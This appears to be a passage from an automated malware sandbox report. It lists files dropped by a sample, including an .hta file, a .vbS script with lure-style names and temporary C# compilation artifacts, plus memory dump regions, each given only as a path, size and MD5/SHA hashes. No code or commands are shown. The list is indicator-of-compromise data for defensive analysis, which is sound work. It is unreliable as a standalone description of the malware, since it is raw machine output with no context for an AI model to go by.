11a98f354aa0f734fde54f469dd33ee568d2d2cd

SHA256
1acbf350d5a07e28bf336d5985edb90737bab9676f16b742fabeb82701d84050

SHA512
8c1595534a8a28cbfd47eac5c7811723f8f80d9c728d0025f5db7ffda6b7abb405bb682c8581033ea6c164a4a5f211605906d2c82302cbb71f109a4ac303d91c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F53EB4E574DE32C870452087D92DBEBB_1D05198E4FEA086037F021F18838C63E

Filesize
471B

MD5
dbadb85871e4f3f4eadd95c3a506ea42

SHA1
1d09db408cd08f9246f200f38cf3b759e090d85f

SHA256
fa23a9c2aadaf557269eb5665bb0b0ba4a576a9b6b253fa8266eedfc1dc15709

SHA512
4ac8d952c6faeb666ea7eafe8cdd73219974b4cee0a9609dd6cfea26090bca3ad4069ef84a45142d0dea1d73244a1cd8042105ecd51c05615ca41df2f5bb6a29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
434B

MD5
7922c7f685df52cc6f3b4985d3059e1d

SHA1
d7181059ab65767b487fc562492ca7cf62839e93

SHA256
f933e1f6ff111f3618759e517640cdf48e125479eb4f9769c8f4a223cfa14c75

SHA512
6e797557919cc2d8aedbb6ad41d442e788d76af09aa06215aa600a5dcb147b7e7d5585cea12758caf57e7087ebe29dd3f1bbf675190574b08ea02a5ea058de1d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f9d8c8222deb6d7d707cfe34ac3f4a43

SHA1
cbea7edcc45f89d55802c9549d48826221018c97

SHA256
48d14eea23f48cfff66c5d2238f4fe9bf7fcad9910089cb1ecc769e182dcdad0

SHA512
495fde901abd344361b7c0634bbca507f447567a5a696dfe83d40d0038855f9d90a2d3da466169f34b164d7e38ea65726794186a4a3ccac3ba6ff87abf61acc9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3ada3d539590145a72247557675b9e10

SHA1
a18fcce91509f0a05e2ec5ad53c39de7f7cda0a3

SHA256
a164e49fec500511ae3aa30e2f12e6f63d05d3db4e8c13facfa520e1ca900ad8

SHA512
8ac0f97de98622869e143606e3132cbb719e6faee6e20af4ae590d7bc8f097ee4031c5f6bf4f4eaeedb11f31cbdf553bc1acf123df1bcf3553c1c2926bb4788c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
458B

MD5
2769c1a04c05ba5409eb331b71a7eb76

SHA1
9560596130385f5d6e00d4af9ecce30bf8b0b2d4

SHA256
cf188c724f98a71c32ddb57eb8b6613e2125e4406e7f58f53fc060e42af23971

SHA512
7b023fad1adae77c56649bd4efa6d155139b36b008da852835aad67a4050789e84183647fe661ac8ba3f1d698fbe094ec041b061dd7553c546047d67f43c6796

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
432B

MD5
ed14f3921ec18bed2a0955d9eaee99fb

SHA1
e141532c1880b2640640d5639de5802a1ee01dbb

SHA256
3b28b434056280c6da66038d9f3365eef6ece87c8c56d26cfecc39906e12f7d6

SHA512
e50a87c25d6ef1adf3eee31ea6a7076893513ef4901a5415db9028ccb5589b1555d2f2ab4a2ca5e856a37c8187f83db673ccb6c0ccecc017b4fb96fdcba2737c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F53EB4E574DE32C870452087D92DBEBB_1D05198E4FEA086037F021F18838C63E

Filesize
426B

MD5
d36e0d11df8266bc1b0fa78d653965f3

SHA1
21dd4fe7a135af0313d6774f2c3759d18bc6e0bc

SHA256
56332b8040adc93af1afdb13ffbd599be811012b2ca1bad1360bba2b71783bf2

SHA512
a1e0b34bf0aad3057adc3129a5b74357c073c975e68a38144ccc3752d23b73d904c156c6e463a8451702063c368ed00dc32e67304cca1b9d478052a03ac3687c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\nicegirlkissedmewithloverissingmegoodgreatthings[1].hta

Filesize
8KB

MD5
842483d04a67c27b01ea5f7c5f61b343

SHA1
0983aa82c399193df44b6092058c0e19371b0082

SHA256
499252477bb698052e47f7025764032057381aef772421a00ed801ef1282a840

SHA512
9f3ba55ff984ddafe193f69aea1410722f810fce459e7076cf503db679b0ac61911857e62d422687b459574a6914420744bc8cebd74eecda257b18e7ed6b8474

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7E95.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA1AD.tmp

Filesize
1KB

MD5
a512024b66ebd8586490fd8054b75fa2

SHA1
21e11b5a9ff32119a7c3041303321124e9b8dcbd

SHA256
59e73f5ab4c5ea1c684fad3fade9439c14b6a2e6b34d542374622750ad8179f1

SHA512
bc865106e5a6b7405b2af8c12e94393f1789cd8edfd4d05c4365bfeae471b3c05af9b5338daf7d4f80815be0a51454d04aea822559c36fe0b5d48055b895785a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7F15.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\guzmqqvxyoshspgajenljkahhltqcjpnwy

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\ig3_fg1s.dll

Filesize
3KB

MD5
6e87a69f495466e6f9c66f489d16a8e5

SHA1
2ef0186966aa99140f53fd8277678a541597a861

SHA256
f2a16d57580f7628884b1ab9c5690496eaa3c8494dd8bf798439bc845163a5ef

SHA512
f6e1bb8e4191e28af811867aab0b351c5a5f0c231c4166d8ec06cb1447ed1e6bf77410347bdc0176f14e1ed97d3ed921af8f55bb0f0ddb1d4c550736b40d1ffd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ig3_fg1s.pdb

Filesize
7KB

MD5
52c9938a242e19447761e9a6b25d87e2

SHA1
bbec528a0852835ae93542e2f2dbb2448ada9fbf

SHA256
2ece5297f9a979e8098bb5734735fa404df862fcf2e40a65051e02d55815a71b

SHA512
af53e73eb02cf2feabdfc65819bdee0a97094040373279a22d4ecc79c40df609bce616ba66c2e1bb83f77e6daf31c1d19c8ed196231a7bd7be3c4eabcd36c4f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
1bf46af08dee02f7cf7ce29345c51ebe

SHA1
889194e4a61aea4ec88b12d5c2220b156eac65f5

SHA256
7f118914b9e852e7edec87cbebe80066b58e025d1c38dd48b153dc082cb39cea

SHA512
d5397f3aa9dc70e3d50bbbbccb67f2a30cdd2641992bc23590414dcd7edd2d2dd351e4e609ec8d9fc4c9383c6cd691cbf519c7d4bde3afb247af8bb6d59e77d5

Download Submit
C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS

Filesize
213KB

MD5
b14ef4fa92414ea1658977a049f15306

SHA1
11e59f935817673e2b68cfd36e4ce93d15034714

SHA256
a6f979fe5ca109e929031fd0811506343b3089a13300438be24070650c6b6bf3

SHA512
8b627fd09767ba773acdbcce52b646b1b819b261b72c17289d443a6c7e504f34b3402a64f73d48fef893d7d38dfbeef213ed5218c211558428307d69a03f9630

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA1AC.tmp

Filesize
652B

MD5
da03cc016d5ff14c41c061e3fe4df002

SHA1
2a28837740e61b3cb0f4798a12aa7fba299eefb4

SHA256
7dd6e9002e324c635946741531da982a1349d64521d5c164530c43f84babd410

SHA512
86f4cf0592396c39c4b53c4d56196742d0e42872de2f7b291e89b35f943e8b04620239e294a549c5b6b3b014760468bc78980e7e5b905ac89760bcf8c7901693

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ig3_fg1s.0.cs

Filesize
478B

MD5
680c55127532e413a19eddb51b0cb473

SHA1
7d279e255bc675f1c09df8b210ee4472b5d3b8b6

SHA256
fdd40f201088921031cf300fdce7ca0be6e458b70d0f5df699cf6a0cc33a7515

SHA512
27a542c554c27adf777c741eb218b7a0634392abced081722b43c51066dfb49d604473a9df4b4e257879355cb966882431286f7bbb2ed5d8a23840d837127205

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ig3_fg1s.cmdline

Filesize
309B

MD5
6722dbfb0c1a01f9507d9e7bb2effa29

SHA1
ee54be23006d1dd32b6dff591bce96d9d7925022

SHA256
7da7e9eb774f098ebce039b90ad29224e82b1e954ee04fe3135ac3c68fea554d

SHA512
2db9b40152d1ef9dd32f47ac6e79745d4335e896a5fa5f56306ccbb104d7f459f8043338db3f6c6c7aa72a23c9f2f7f5edb074afd0c244b5287eda3030ffa51c

Download Submit
memory/776-135-0x0000000002900000-0x0000000002902000-memory.dmp

Filesize
8KB

Download
memory/844-190-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-235-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-247-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-202-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-201-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-200-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/844-198-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-196-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-194-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-192-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-188-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-246-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-203-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-204-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-205-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-206-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-207-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-210-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-211-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-212-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-245-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-244-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-243-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-242-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-241-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-240-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-239-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-238-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-236-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-237-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/844-234-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/844-230-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/844-233-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2396-160-0x00000000722CD000-0x00000000722D8000-memory.dmp

Filesize
44KB

Download
memory/2396-136-0x0000000002520000-0x0000000002522000-memory.dmp

Filesize
8KB

Download
memory/2396-1-0x00000000722CD000-0x00000000722D8000-memory.dmp

Filesize
44KB

Download
memory/2396-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2676-216-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2676-220-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2676-217-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2928-221-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2928-222-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2928-223-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2928-224-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2960-219-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2960-214-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2960-218-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download